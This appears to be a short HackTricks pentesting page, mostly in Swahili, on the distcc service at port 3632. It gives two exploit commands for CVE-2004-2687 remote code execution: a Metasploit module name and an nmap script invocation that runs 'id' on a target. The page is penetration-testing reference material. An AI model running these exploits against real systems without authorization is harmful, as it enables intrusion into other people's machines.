3632 - Pentesting distcc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu ya usindikaji isiyotumika ya kompyuta nyingine katika mtandao. Wakati distcc imewekwa kwenye mashine, mashine hii ina uwezo wa kusambaza kazi za uundaji kwa mfumo mwingine. Mfumo huu wa kupokea lazima uwe na distccd daemon inayoendesha na lazima iwe na compiler inayofaa iliyowekwa ili kushughulikia msimbo uliopelekwa.

Default port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Ukatili

Angalia ikiwa ina udhaifu wa CVE-2004-2687 kutekeleza msimbo wa kawaida:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Sidhani kama shodan inagundua huduma hii.

Resources

Post created by Álex B (@r1p)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated